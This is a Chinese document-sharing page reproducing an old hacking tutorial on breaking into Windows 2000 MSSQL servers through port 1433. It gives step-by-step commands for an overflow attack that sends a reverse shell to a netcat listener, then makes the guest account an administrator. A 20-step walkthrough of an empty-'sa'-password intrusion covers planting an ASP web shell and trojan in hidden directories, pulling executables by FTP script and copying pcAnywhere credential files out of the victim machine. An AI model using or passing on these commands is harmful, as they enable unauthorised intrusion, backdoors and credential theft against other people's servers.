为了正常的体验网站,请在浏览器设置里面开启Javascript功能!

34-1 1433的溢出攻击

2012-11-04 6页 doc 157KB 11阅读

用户头像

is_608428

暂无简介

举报
34-1 1433的溢出攻击 在win2000机器上装了mssql的话,机器就会开1433端口。什么是端口,就像食堂买菜的窗口一样,你买白菜上1号窗,买西红柿上2号窗。在机器上买mssql就上1433窗。   溢出1433需要两个工具:nc.exe和sql2.exe,在www.sandflee.net都有下载。进攻方法就两步:   第一步,在自己机器上开一个cmd窗口。对了,你要用win2000的话,就开始-运行-写入cmd回车。这里我们只用2000,不说98。如果你把你下的nc.exe和sql2.exe和我习惯一样放在c:盘的话,就在你开的这个...
34-1 1433的溢出攻击
在win2000机器上装了mssql的话,机器就会开1433端口。什么是端口,就像食堂买菜的窗口一样,你买白菜上1号窗,买西红柿上2号窗。在机器上买mssql就上1433窗。   溢出1433需要两个工具:nc.exe和sql2.exe,在www.sandflee.net都有下载。进攻方法就两步:   第一步,在自己机器上开一个cmd窗口。对了,你要用win2000的话,就开始-运行-写入cmd回车。这里我们只用2000,不说98。如果你把你下的nc.exe和sql2.exe和我习惯一样放在c:盘的话,就在你开的这个窗口下打入命令c:>nc -l -p 40回车。这步的意思是用nc这个工具开一个40的端口监听。   第二步:再在开始-运行-写入cmd回车,再开一个窗口。在这个窗口写命令行c:>sql2.exe 你要入侵网站的ip 自己的ip 40 0回车。这里要作点说明:如何得到入侵网站ip?在cmd下c:>ping www.xxxxx.com就可以看到了。自己的ip呢?在cmd下c:>ipconfig就可以看到了。其中命令行中的40你可以随意改成别的,但好像40和53成功率高一点。再是命令中的0不行的话,你就试试1或2。如果入侵网站有这个漏洞话,那么你开的第一个窗口就会变成肉鸡的c:\winnt\system32>.就是说,你已经进入它的机器里了。进去以后,你可以填加个用户了。net user guest /active:yes用这个命令,就将默认禁止的guest用户激活。net user guest 123456这样guest的密码变成123456了。net localgroup administrators guest /add这就是guest成为最高权限的管理员了。      本贴包含图片附件:           第二:1433空密码入侵。1433还有一个漏洞,就是如果默认安装的话,用户名是sa,密码是空的。那么我们就可以用supersqlexec.exe连接上去,这东东在www.sandflee.net也有下。看看入侵方法,我以前在小榕论坛贴的:lcx的win98下sa空密码入侵脚本20步    1.如何找到sa空密码肉鸡?自己用流光扫吧。    2.注意这是在win98下入侵sa的真实情况。局域网中的win98,在网吧里。    3.工具:supersqlexec.exe、cmd.asp(www.sandflee.net有下)海阳顶端网木马(黑白)放在本机f:盘    4.用supersqlexec联接成功。在命令行中输入:     net user guest /active:yes     (>指肉鸡回显下同)The command completed successfully.      本贴包含图片附件:      net user guest 123456   > The command completed successfully   net localgroup administrators guest /add   > The command completed successfully.   这几个命令做完后,意思是将guest用户激活,密码是123456,并提升为admin。又是这个命令,复习一下。    5.心中暗喜,换到2000系统下启动流光的种植者给它种个冰河。奇怪了,无论如何也不成功。(其实有时流光种植者不成功,但用手工方法就可以.    6.换个用户名吧。回到supersqlexe.exe的命令模式net user lcx 123456 /add,命令失败。服务器没开   ipc$?    7.回到sqlexe命令行中net start lanmanserver肉鸡却显示ipc$已启动。为何在这一步流光联不上,我百思不得其解。我后来换wn2000的cmd下net use \\ip\ipc$ "123456" /user:"guest"也不能联接成功。  8.换个思路吧。在本机上将f:设为共享,在dos下ipconfig.exe得知自己本机ip    9.回到sqlexe命令行中net use x: \\本机ip\f,将自己本机f:盘映射成为肉鸡的x:盘。过了一会,服务器  显示命令成功完成.    10.sqlexe命令行中运行set得知其主页位置在d:\inetpub\wwwroot。不错,服务器支持asp.你如果看不懂这 个命令,也可以根据其主页上某个图像文件名,然后dir *.jpg/s查找其主页位置。    11.sqlexe命令行中copy x:\cmd.asp d:\inetpub\wwwroot,这个目录是肉鸡网站的目录。    12.回到ie中http://服务器ip/cmd.asp,出现了ie界面的dos.建个文件夹看看。     md d:\inetpub\wwwroot\aspmm    13.sqlexec命令行中copy x:\海阳顶端网木马\*.* d:\inetpub\wwwroot\aspmm\.再将目录隐藏   attrib +h d:\inetpub\wwwroot\aspmm    14.现在你可以用海阳顶端网木马上传任意文件了。完全控制了肉鸡的文本文件。当然你也可以通过映射来   copy.呀!这台服务器不支持fso,海阳顶端网木马无法运行。那么我们试一下ftp上传。先将自己的文件*.exe上传到个人主页空间。    15.在自己本机上建立up.txt内容如下:   open ftp1.go.163.com(说明:这里是指我用得是网易ftp)   username(说明:你的上传用户名)   password(说明:密码)   get lcx.exe(说明:你要上传到肉鸡的文件名)   bye(说明:退出ftp)   通过映射copy到肉鸡的c:\up.txt   16.sqlexec命令行中ftp -s:c:\up.txt(注:ftp的用法你在win2000里的帮助里可以很详细查到)等一会你 就看到lcx.exe已经在肉鸡在\winnt\system32\下了。   17.运气好的话应该可以ipc联接成功,开个端口进去的。然后就可以做个代理、做个跳板了,可惜我运气 不好,这台机器无法ipc$成功,流光种植者无法联接。上传了好几个exe木马也无法运行。如何运行你上 传的木马,就看第二节   18. 通过仔细查找,得知肉鸡装了pcanywhere.查*.cif,该文件却在C:/WINNT/Profiles/All Users/Application Data/Symantec/pcAnywhere这里,好深的目录。怎样copy它呢?   19.通过一天的dos8.3规则的补习才知应是这样 :   copy c:\winnt\Profiles\alluse~1\applic~2\symantec\pcanyw~1\*.cif d:\inetpub\wwwroot\.然后通过 ie下载。其实,也可以用asp写一个小程序copy.   20.流光cif文件解码,得知用户名和密码。唯一遗憾的是ipc$无法成功,无法开端口进去,guest用户却可 以激活不知什么原因。     其实用supersqlexec.exe连上以后,可以有很多方法。像还可以用echo写我在第15步提到的那个up.txt.   echo 你要写的 >>up.txt就可以了,虽然肉鸡回显说写失败,其实已经成功了。就像一个人喊捉贼,贼吓跑了,家里却早乱了。注意,你用echo一次只可写一行。 
/
本文档为【34-1 1433的溢出攻击】,请使用软件OFFICE或WPS软件打开。作品中的文字与图均可以修改和编辑, 图片更改请在作品中右键图片并更换,文字修改请直接点击文字进行修改,也可以新增和删除文档中的内容。
[版权声明] 本站所有资料为用户分享产生,若发现您的权利被侵害,请联系客服邮件isharekefu@iask.cn,我们尽快处理。 本作品所展示的图片、画像、字体、音乐的版权可能需版权方额外授权,请谨慎使用。 网站提供的党政主题相关内容(国旗、国徽、党徽..)目的在于配合国家政策宣传,仅限个人学习分享使用,禁止用于任何广告和商用目的。
热门搜索

历史搜索

    清空历史搜索